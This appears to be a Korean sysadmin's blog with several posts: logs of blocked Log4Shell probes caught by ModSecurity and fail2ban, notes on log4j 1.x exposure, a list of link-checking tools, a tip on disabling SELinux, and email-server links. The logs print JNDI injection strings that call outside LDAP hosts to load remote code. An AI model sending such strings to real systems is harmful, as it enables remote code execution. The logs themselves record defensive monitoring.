작은 행복을 위한 시

Log4shell 첫 발생 외

관리중인 서버에 첫번째 log4shell 공격 확인

[11/Dec/2021:07:14:50 +0900] [xxx.xxx.xxx.189/sid#a353cf0][rid#b571a40][/${jndi:ldaps://41e1e3ec.probe001.log4j.leakix.net:8443/b}][1] Access denied with code 400 (phase 2). Pattern match "^[\d\.]+$" at REQUEST_HEADERS:Host. [file "/etc/httpd/modsecurity.d/modsecurity_crs_21_protocol_anomalies.conf"] [line "60"] [id "960017"] [msg "Host header is a numeric IP address"] [severity "CRITICAL"] [tag "PROTOCOL_VIOLATION/IP_HOST"]
[11/Dec/2021:12:46:34 +0900] [xxx.xxx.xxx.142/sid#a64c530][rid#b3a2cd0][/${jndi:ldaps://6c60d031.probe001.log4j.leakix.net:1266/b}][1] Access denied with code 400 (phase 2). Pattern match "^[\d\.]+$" at REQUEST_HEADERS:Host. [file "/etc/httpd/modsecurity.d/modsecurity_crs_21_protocol_anomalies.conf"] [line "60"] [id "960017"] [msg "Host header is a numeric IP address"] [severity "CRITICAL"] [tag "PROTOCOL_VIOLATION/IP_HOST"]
[11/Dec/2021:12:46:35 +0900] [xxx.xxx.xxx.142/sid#a64c530][rid#b18e3d8][/${jndi:ldaps://6c60d031.probe001.log4j.leakix.net:1266/b}][1] Access denied with code 400 (phase 2). Pattern match "^[\d\.]+$" at REQUEST_HEADERS:Host. [file "/etc/httpd/modsecurity.d/modsecurity_crs_21_protocol_anomalies.conf"] [line "60"] [id "960017"] [msg "Host header is a numeric IP address"] [severity "CRITICAL"] [tag "PROTOCOL_VIOLATION/IP_HOST"]

Log4Shell 차단용 fail2ban 세팅 후 검출

The IP 121.4.56.143 has just been banned by Fail2Ban after
1 attempts against apache-log4j.


Here is more information about 121.4.56.143:

[Querying whois.apnic.net]
[whois.apnic.net]
% [whois.apnic.net]
% Whois data copyright terms    http://www.apnic.net/db/dbcopyright.html

% Information related to '121.4.0.0 - 121.5.255.255'

% Abuse contact for '121.4.0.0 - 121.5.255.255' is 'ipas@cnnic.cn'

inetnum:        121.4.0.0 - 121.5.255.255
netname:        TencentCloud
descr:          Tencent cloud computing (Beijing) Co., Ltd.
descr:          Floor 6, Yinke Building,38 Haidian St,
descr:          Haidian District Beijing
country:        CN
admin-c:        JT1125-AP
tech-c:         JX1747-AP
abuse-c:        AC1601-AP
status:         ALLOCATED PORTABLE
mnt-by:         MAINT-CNNIC-AP
mnt-lower:      MAINT-CNNIC-AP
mnt-routes:     MAINT-CNNIC-AP
mnt-irt:        IRT-CNNIC-CN
last-modified:  2021-06-16T01:32:05Z
source:         APNIC

irt:            IRT-CNNIC-CN
address:        Beijing, China
e-mail:         ipas@cnnic.cn
abuse-mailbox:  ipas@cnnic.cn
admin-c:        IP50-AP
tech-c:         IP50-AP
auth:           # Filtered
remarks:        Please note that CNNIC is not an ISP and is not
remarks:        empowered to investigate complaints of network abuse.
remarks:        Please contact the tech-c or admin-c of the network.
mnt-by:         MAINT-CNNIC-AP
last-modified:  2021-06-16T01:39:57Z
source:         APNIC

role:           ABUSE CNNICCN
address:        Beijing, China
country:        ZZ
phone:          +000000000
e-mail:         ipas@cnnic.cn
admin-c:        IP50-AP
tech-c:         IP50-AP
nic-hdl:        AC1601-AP
remarks:        Generated from irt object IRT-CNNIC-CN
abuse-mailbox:  ipas@cnnic.cn
mnt-by:         APNIC-ABUSE
last-modified:  2020-05-14T11:19:01Z
source:         APNIC

person:         James Tian
address:        9F, FIYTA Building, Gaoxinnanyi Road,Southern
address:        District of Hi-tech Park, Shenzhen
country:        CN
phone:          +86-755-86013388-84952
e-mail:         clarkcheng@tencent.com
nic-hdl:        JT1125-AP
mnt-by:         MAINT-CNNIC-AP
last-modified:  2021-09-17T00:37:15Z
source:         APNIC

person:         Jimmy Xiao
address:        9F, FIYTA Building, Gaoxinnanyi Road,Southern
address:        District of Hi-tech Park, Shenzhen
country:        CN
phone:          +86-755-86013388-80224
e-mail:         klayliang@tencent.com
nic-hdl:        JX1747-AP
mnt-by:         MAINT-CNNIC-AP
last-modified:  2021-09-17T00:38:09Z
source:         APNIC

% Information related to '121.4.0.0/15AS45090'

route:          121.4.0.0/15
origin:         AS45090
descr:          China Internet Network Information Center
                Floor1, Building No.1 C/-Chinese Academy of Sciences
                4, South 4th Street
                Haidian District,
mnt-by:         MAINT-CNNIC-AP
last-modified:  2020-02-25T01:14:09Z
source:         APNIC

% This query was served by the APNIC Whois Service version 1.88.15-SNAPSHOT (WHOIS-JP1)


Lines containing IP:121.4.56.143 in /var/log/httpd/*access_log

/var/log/httpd/ssl_xxxx_access_log:121.4.56.143 - - [16/Dec/2021:17:08:51 +0900] "GET /${jndi:ldap://185.224.139.151:1389/Exploit} HTTP/1.1" 400 226
/var/log/httpd/ssl_xxxx_access_log:121.4.56.143 - - [16/Dec/2021:17:08:52 +0900] "GET / HTTP/1.1" 400 226
/var/log/httpd/ssl_xxxx_access_log:121.4.56.143 - - [16/Dec/2021:17:08:52 +0900] "POST /login HTTP/1.1" 400 226
/var/log/httpd/ssl_xxxx_access_log:121.4.56.143 - - [16/Dec/2021:17:08:52 +0900] "GET / HTTP/1.1" 400 226

#log4shell #log4j #fail2ban

log4j 1.x가 CVE-2021-44228에 취약합니까?

log4j 1.x는  현재 CVE-2021-44228에 영향을 받는 버전으로 나열되지 않았다.
다만 수명 종료로 이미 알려진 이전 보안 문제를 포함하여 더이상 패치나 수정이 제공되지 않는다. 

여기 에 대한 의견에 따르면 log4j 1.x의 JMSAppender에 유사한 문제가 있을 수 있지만 JMSAppender가 활성화 되어 있어야 한다는 조건이 있다. 그리고 기본적으로 활성화되어 있는 조건도 아니다.
업데이트: JMSAppender 문제에 식별자: CVE-2021-4104 가 지정되었다.

JMSAppender를 사용하고 있는지는 아래와 같이 확인할 수 있다.
아래의 파일들에서 log4j 구성을 확인 하여 다음과 같은 JMSAppender또는 SocketAppender( CVE-2019-17571 )을 사용하지 않는지 확인하면된다.

• log4j.properties
• logger.xml
• logging.properties

면책 조항: 이 페이지의 콘텐츠(및 링크)는 어떤 종류의 보증 없이 있는 그대로 제공됩니다. 자신의 책임하에 사용하십시오. 적절한 보호를 위해 소프트웨어 공급업체에 문의해야 합니다.

https://www.petefreitag.com/item/923.cfm

#Log4j #Vulnerability

Apache Log4j 1.2.x 버전 취약점 해결 방법

Share

Improve this answer

Follow

edited 9 hours ago

 

 

answered yesterday

giraffesyo

3,79311 gold badge2222 silver badges35

https://stackoverflow.com/questions/70310980/log4j-vulnerability-is-log4j1-2-17-vulnerable-was-unable-to-find-any-jndi-cod

#log4j-vulnerability 

30 가지 최고의 웹 사이트 링크 검증 테스트 도구

https://ko.myservername.com/30-top-website-link-verification-testing-tools

30 가지 최고의 웹 사이트 링크 검증 테스트 도구
# 1) W3C 링크 검사기 :

사용자가 링크, CSS 스타일 시트의 유효성을 검사하고 웹 페이지에서 참조 된 개체가 있는지 확인할 수있는 온라인 오픈 소스 도구입니다. 이 유틸리티는 W3C에서 제공하는 유효성 검사기 도구 중 하나입니다. 이것은 무료이기 때문에 확실히 좋은 도구입니다.

다운로드 링크: W3C 링크 검사기

# 2) Screaming Frog SEO 스파이더 도구 :

Screaming Frog 웹 사이트 링크 검증 테스트 도구

Screaming frog의 SEO Spider는 중대형 사이트의 끊어진 링크를 확인하려는 경우 훌륭한 도구입니다. 설치가 매우 쉽고 모든 PC, Mac 또는 Linux 시스템에서 작동 할 수있는 데스크톱 응용 프로그램으로 제공됩니다.이 도구가 수행하는 주요 검사는 SEO 관점에서 이루어집니다.

다운로드 링크: Screaming Frog SEO 스파이더 도구

# 3) 온라인 웹 사이트 링크 검사기 :

끊어진 링크를 확인하는 오픈 소스 온라인 도구입니다. 이 도구를 사용하면 기능이있는 사용자가 검색 할 최대 페이지 수를 설정할 수 있습니다. 사용자는 도구가 소스 페이지 만 검색해야하는지 또는 모든 페이지를 검색해야하는지 의미하는 깊이를 정의 할 수도 있습니다.

다운로드 링크: 온라인 웹 사이트 링크 검사기

# 4) 데드 링크 검사기 :

무료 끊어진 링크 검사기입니다. 도구는 한 번에 여러 사이트를 통한 확인을 지원하며 사용자가 데드 링크 검사기를 사용하여 웹 사이트 확인을 예약 할 수있는 자동 확인 기능이 있으며 프로세스가 완료되면 도구가 자동으로 보고서를 보냅니다.

다운로드 링크: 데드 링크 검사기

# 5) 웹 사이트 펄스 :

Website Pulse의 Link Check는 URL 가용성을 확인하고 전체 HTML 콘텐츠를 다운로드하며 모든 내부 구성 요소 및 페이지에있는 모든 링크의 가용성을 확인합니다. 또한 웹 사이트 테스트, 웹 페이지 테스트 및 HTTP 헤더 테스트 기능을 제공합니다.

다운로드 링크: 웹 사이트 펄스

# 6) 사이버 스파이더 링크 테스트

이 도구는 웹 사이트에서 끊어진 URL을 확인하는 데 사용됩니다. 이것은 개인 웹 사이트에서 수많은 링크가있는 매우 큰 사이트에 이르기까지 모든 규모의 사이트에서 잘 작동합니다. 이것은 웹 링크 확인을 위해 시장에서 사용할 수있는 가장 저렴한 도구 중 하나입니다.

다운로드 링크: 사이버 스파이더 링크 테스트

# 7) Sortsite :

Sortsite는 Mac OS X 및 Windows 용 데스크톱 응용 프로그램입니다. 이것은 한 번의 클릭으로 작동하며 접근성, 깨진 링크, 호환성, SEO, 개인 정보 보호, 웹 표준 및 유용성을 확인합니다. 매우 빠른 도구이며 사이트에서 사용 가능한 모든 페이지를 테스트합니다.

다운로드 링크: Sortsite

# 8) 온라인 끊어진 링크 검사기 :

웹 사이트에서 끊어진 링크를 검색하고 내부 및 외부 URL의 유효성 검사를 지원하며 사용자에게 오류 위치를 알려주고 페이지 수에 제한없이 검색 할 수있는 온라인 도구입니다.

다운로드 링크: 온라인 끊어진 링크 검사기

# 9) Xenu의 링크 조사 :

이 도구는 웹 사이트에서 끊어진 링크를 확인합니다. '일반'링크, 이미지, 프레임, 플러그인, 배경, 로컬 이미지 맵, 스타일 시트, 스크립트 및 Java 애플릿에 대한 링크 검증을 허용합니다. 끊어진 링크를 재확인하는 기능, 사용자에게 메일로 보낼 수있는 손쉬운 보고서 생성 기능을 제공합니다.

다운로드 링크: Xenu의 링크 탐정

# 10) 무료 링크 검사기

무료 링크 검사기는 끊어진 링크를 확인하는 데스크톱 프리웨어 도구입니다. 이 프로그램에는 HTML 링크 스파이더와 끊어진 링크 분석기가 포함되어 있습니다. 무료 링크 검사기는 끊어진 링크 확인, 잘못된 링크 보고서 표시, 진행률 추적, 인증 (사용자 이름 및 암호) 및 프록시 설정에 대한 다양한 설정을 제공합니다.

다운로드 링크: 무료 링크 검사기

# 11) Site24X7

Site24X7은 4 개의 유효성 검사 도구, 서버 헤더를 확인하고 HTTP 상태 코드를 확인하는 서버 헤더 도구, 끊어진 링크를 확인하는 링크 검사기, HTML 코드를 정리하고 웹 페이지를 최적화하는 코드 클리너, HTML 코드를 확인하는 HTML 코드 유효성 검사기를 갖추고 있습니다. W3C 표준에 기반한 도메인

다운로드 링크: Site24X7

# 12) 링크 스캔

LinkScan ™은 강력한 링크 확인 및 웹 사이트 관리 도구입니다. Perl 버전 5 이상이 설치된 UNIX 및 Microsoft Windows 운영 체제와 호환되며 모든 HTTP 1.0 또는 HTTP 1.1 호환 웹 서버와 호환되도록 설계되었습니다.

다운로드 링크: 링크 스캔

# 13) Pingdom 도구

Pingdom의 웹 사이트 모니터링 도구는 최종 사용자가 웹 사이트의로드 속도를 분석하고 웹 사이트를 더 빠르게 만드는 방법을 배우는 데 도움이됩니다. 이 도구는 웹 페이지의 모든 부분을 검사하고 Google Page Speed의 성능 모범 사례에 대한 웹 사이트 적합성을 확인합니다. 사용자가 여러 위치에서 테스트하고 성능 기록을 추적 할 수 있습니다.

다운로드 링크: Pingdom 도구

# 14) 헤라

시각 오류를 식별하기 위해 각 페이지를 탐색하는 웹 접근성 도구입니다.

검사는 WCAG 지침을 사용하여 수행됩니다. 오류가 발견되면 몇 가지 수동 검사를 수행하고 문제가있는 영역을 강조 표시하고 사용자에게 두 가지보기 보고서를 제공합니다 (하나는 일반 페이지이고 다른 하나는 강조 표시된 HTML 소스 코드). 이는 최종 사용자가 문제를 파악하고 문제를 해결하기위한 빠른 수정을 수행하는 데 도움이됩니다.

# 15) 웹 링크 검사기

Web Link Validator 웹 사이트 링크 검증 테스트 도구

Web Link Validator는 웹 마스터가 링크의 정확성과 가용성을 확인하고 깨진 링크와 구문 오류가 포함 된 링크를 찾을 수있는 강력한 링크 검사기 및 사이트 관리 도구입니다. 이 도구는 웹 사이트의 품질을 유지하려는 모든 사람에게 진정한 도움이됩니다. 이렇게하면 끊어진 링크를 추적하고 HTML 코드의 정확성을 확인하여 잠재 고객의 웹 사이트 환경을 개선합니다.

다운로드 링크: 웹 링크 검사기

# 16) 링크 타이거

링크 Tiger 웹 사이트 링크 검증 테스트 도구

Link Tiger는 웹 사이트에서 끊어진 링크를 찾고 끊어진 링크 보고서를 생성합니다. 이 도구는 다운로드가 필요하지 않으며 연중 무휴 24 시간 웹 사이트 스캔이 가능합니다.이 도구는 뛰어난 화면 시각화 및보고 기능과 함께 제공됩니다. LinkTiger는 웹 페이지에서 끊어진 링크를 찾을뿐만 아니라 웹 사이트의 모든 PDF, CSS, FLASH, JavaScript 또는 MS Office 문서에서 끊어진 링크를 확인합니다.

다운로드 링크: 링크 호랑이

# 17) 링크 검사기 프로

Link Checker Pro는 웹 사이트 분석 및 끊어진 링크 및 기타 문제 링크 감지를위한 선도적 인 솔루션입니다. 주요 기능에는 매우 빠른 작동, 모든 주요 프로토콜 (HTTP, HTTPS 및 FTP 포함)에 대한 지원, 웹 사이트의 그래픽 표현 생성 기능, 다양한 형식으로 데이터 내보내기 및 완전히 구성 가능한 기능이 포함됩니다. 사용하기 쉬운 인터페이스를 제공하며 100,000 개 이상의 링크가 포함 된 웹 사이트를 처리 할 수 ​​있습니다.

처음부터 자동화 테스트를 시작하는 방법
다운로드 링크: 링크 검사기 프로

# 18) Wummel-링크 검사기

LinkChecker는 무료입니다. LPG 라이센스가있는 웹 사이트 유효성 검사기. 재귀 및 다중 스레드 검사 및 사이트 크롤링을 허용합니다. 명령 줄, UI 클라이언트 또는 웹 인터페이스를 사용하여 실행할 수 있습니다.

다운로드 링크: Wummel-링크 검사기

# 19) HTML 유효성 검사기 프로

HTML 유효성 검사, 맞춤법 검사, 끊어진 링크 확인 및 JavaScript linter를 허용하는 온라인 도구입니다. 여러 검사를 함께 수행 할 수 있습니다. 예를 들어이 도구를 사용하여 끊어진 링크를 확인하고 동일한 실행에서 맞춤법 검사를 수행 할 수 있습니다.

다운로드 링크: HTML 검사기 프로

# 20) Weblight Illumit

WebLight는 대규모 웹 사이트를 테스트 할 수있는 빠른 링크 검사기 그 이상입니다. 고품질 웹 사이트를 효율적으로 유지 관리하는 데 도움이되는 웹 사이트 유지 관리 도구입니다. 수천 개의 링크가있는 사이트를 빠르게 분석합니다. 사이트의 모든 링크, CSS 및 마크 업 문제를 검토하고 문제를 분류 및 필터링합니다.

다운로드 링크: Weblight Illumit

# 21) 웹 사이트 정리

Website Cleanup.com을 사용하면 웹 사이트를 온라인으로 확인하여 일반적으로로드 시간에 영향을 미치는 끊어진 링크, html 유효성 검사 오류, 메가 태그 내용 및 웹 페이지 크기를 찾을 수 있습니다.

다운로드 링크: 웹 사이트 정리

# 22) Jenu 링크 검사기

Jenu는 Java를 사용하여 구축 된 웹 사이트의 링크 검사기입니다. 이것은 기본적으로 모든 JDK 1.3 런타임에서 실행할 수 있습니다. 이것은 sourceforge에서 호스팅되고 다운로드 할 수 있습니다.

다운로드 링크: Jenu 링크 검사기

# 23) 링크 확인

Java 지원 브라우저에서 실행되는 링크 검사기. 이것은 기본적으로 하이퍼 텍스트 파일 세트를 확인하고 외부 리소스에 대한 모든 참조가 작동하는지 확인합니다. HTML의 경우 포함 된 이미지와 하이퍼 링크를 확인하고 스타일 시트도 확인합니다. 브라우저를 통해 실행할 때 도구는 해당 서버에서 사용 가능한 파일에만 액세스 할 수 있으므로 모든 파일을 완전히 제어하려면 도구를 로컬 시스템에 설치해야합니다.

다운로드 링크: 링크 확인

# 24) ht : // 체크

ht : // Check는 사이트 전체의 접근성 검사를 수행 할 수있는 최초의 웹 도구 중 하나이며 링크 검사기 이상입니다. GNU / Linux 시스템 용으로 C ++로 작성된 콘솔 애플리케이션이며 인터넷에서 무료로 사용할 수있는 최고의 검색 엔진에서 파생되었습니다. ht : // 파기 . 예상치 못한 끊어진 링크를 발견하기 위해 웹 사이트를 제어하고 모니터링하려는 웹 마스터에게 매우 유용합니다.

다운로드 링크: ht : // 체크

# 25) LinkRunner 경고

이것은 인터넷 또는 하드 드라이브에서 로컬 사이트를 확인할 수있는 사용하기 쉬운 링크 유효성 검사 도구이며 뛰어난보고 및 이메일 기능과 함께 제공됩니다. 도구를 사용하면 확인 일정을 예약 할 수 있으므로 최종 사용자의 작업이 훨씬 쉬워집니다.

다운로드 링크: LinkRunner 경고

# 26) 인터넷 감독 -URL 검사기

이름에서 알 수 있듯이 Internet Supervision은 웹 사이트의 가용성을 모니터링하는 데 사용되는 도구입니다. 또한 성능을 감독하고 문제가 발견되면 사용자가 신속하게 조치를 취하여 사이트를 다시 복구하고 해결할 수 있도록합니다. 또한 보안 관점에서 모니터링하여 사이버 공격이있는 경우이를 차단합니다.

다운로드 링크: 인터넷 감독 -URL 검사기

# 27) 내 링크 확인 :

끊어진 링크를 확인할 수있는 Google 크롬 확장 프로그램입니다. 내 링크 확인은 웹 페이지에있는 모든 링크를 신속하게 찾아 각각을 확인합니다. 어떤 것이 유효하고 어떤 것이 깨 졌는지 강조합니다.

다운로드 링크: 내 링크 확인 1 , 내 링크 확인 2 .

# 28) 웹 접근성 검사기 :

AChecker는 웹 페이지의 위치를 ​​입력하거나, html 파일을 업로드하거나, 웹 페이지에서 전체 HTML 소스 코드를 붙여 넣어 HTML 콘텐츠의 접근성 문제를 평가하는 데 사용됩니다. 3 가지 유형의 문제 알려진 문제, 가능성있는 문제 및 잠재적 문제를 식별합니다.

다운로드 링크: 웹 접근성 검사기

# 29) 링크 페이지 생성기

세 가지 기능을 가진 자동 링크 관리 프로그램 : html 형식으로 데이터베이스에 링크 나열, 브라우저를 사용하여 데이터베이스에 링크 추가 및 선택적으로 불량 링크 확인 (cron 작업 별)

다운로드 링크: 링크 페이지 생성기

# 30) Truwex 온라인

섹션 508, WCAG 1.0 및 WCAG 2.0 표준에 대해 웹 사이트의 접근성을 확인하는 웹 사이트 접근성 도구입니다.

다운로드 링크: Truwex 온라인

위 목록은 사용 가능한 웹 사이트 링크 확인 테스트 도구에 대한 아이디어를 제공합니다. 그러나 귀하의 요구 사항에 맞는 도구를 알기 위해서는 몇 가지 분석이 필요합니다. 이 목록이 적절한 웹 링크 확인 도구를 찾는 데 도움이되기를 바랍니다.

1. 테스트 용도니까 SELinux는 꺼버리자.

setenforce 0

그리고 아래 파일 수정

/etc/selinux/config

수정할 내용 :
SELINUX=disabled

2. selinux 설정하는 부분에서 disabled로 수정하는것도 명령어로 가능합니다.
# lokkit --selinux=disabled

#Linux #SELinux

오픈소스 이메일 서버를 이용하여 안전한 자신만의 이메일 서버 구축하기

How to Set Up Your Own Secure Email Server
https://lifehacker.com/how-to-set-up-your-own-secure-email-server-1848026797

Free, open-source Mailcow software
https://mailcow.email
https://mailcow.github.io/mailcow-dockerized-docs/

#opensource #EmailServer #mailcow #lifehacker